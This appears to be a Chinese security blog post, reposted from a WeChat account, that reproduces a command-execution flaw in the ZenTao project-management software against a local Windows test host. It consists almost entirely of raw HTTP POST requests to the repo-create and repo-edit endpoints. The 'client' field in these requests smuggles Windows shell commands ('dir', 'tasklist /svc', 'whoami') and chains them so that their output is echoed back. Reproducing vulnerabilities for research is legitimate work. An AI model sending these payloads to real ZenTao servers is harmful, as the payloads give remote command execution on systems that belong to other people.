分析过程其他公众号已经有了
直接贴过程:
http://192.168.0.117/zentao/misc-captcha-user.html
POST /zentao/repo-create.html HTTP/1.1Host: 192.168.0.117Content-Length: 111Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.0.117Referer: http://192.168.0.117/zentao/repo-create.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Cookie: zentaosid=c91327f20fb21fa5cbd54bfcb9c4e9be; lang=zh-cn; device=desktop; theme=defaultConnection: closeproduct%5B%5D=9999&SCM=Gitlab&name=9999&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=aaa
POST /zentao/repo-edit-7-0.html HTTP/1.1Host: 192.168.0.117Content-Length: 160Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.0.117Referer: http://192.168.0.117/zentao/repo-edit-6-0.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Cookie: zentaosid=c91327f20fb21fa5cbd54bfcb9c4e9be; lang=zh-cn; device=desktop; theme=defaultConnection: closeproduct%5B%5D=9999&SCM=Subversion&serviceHost=&name=9999&path=aa&encoding=utf-8&client=cmd.exe /c dir > e:/zzzz.txt||&account=&password=&encrypt=base64&desc=aaa
今天有时间,把win回显解决一下,方便脚本来做漏洞验证。
linux 回显很简单,网上都是针对linux的脚本。
这里要让结果出错使用&&
核心代码
cmd.exe /c "whoami" %26%26 <执行tasklist /svc
POST /zentao/repo-edit-7-0.html HTTP/1.1Host: 192.168.0.117Content-Length: 183Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.0.117Referer: http://192.168.0.117/zentao/repo-edit-6-0.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Cookie: zentaosid=c91327f20fb21fa5cbd54bfcb9c4e9be; lang=zh-cn; device=desktop; theme=defaultConnection: closeproduct%5B%5D=9999&SCM=Subversion&serviceHost=&name=9999&path=aa&encoding=utf-8&client=cmd.exe /c "chcp 65001 %26%26 tasklist /svc" %26%26 <&account=&password=&encrypt=base64&desc=aaa
执行whoami
POST /zentao/repo-edit-7-0.html HTTP/1.1Host: 192.168.0.117Content-Length: 176Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.0.117Referer: http://192.168.0.117/zentao/repo-edit-6-0.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Cookie: zentaosid=c91327f20fb21fa5cbd54bfcb9c4e9be; lang=zh-cn; device=desktop; theme=defaultConnection: closeproduct%5B%5D=9999&SCM=Subversion&serviceHost=&name=9999&path=aa&encoding=utf-8&client=cmd.exe /c "chcp 65001 %26%26 whoami" %26%26 <&account=&password=&encrypt=base64&desc=aaa
未解决ipconfig命令不知道为啥不行
原文始发于微信公众号(安全学习与分享):禅道命令执行漏洞复现-实现win回显
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论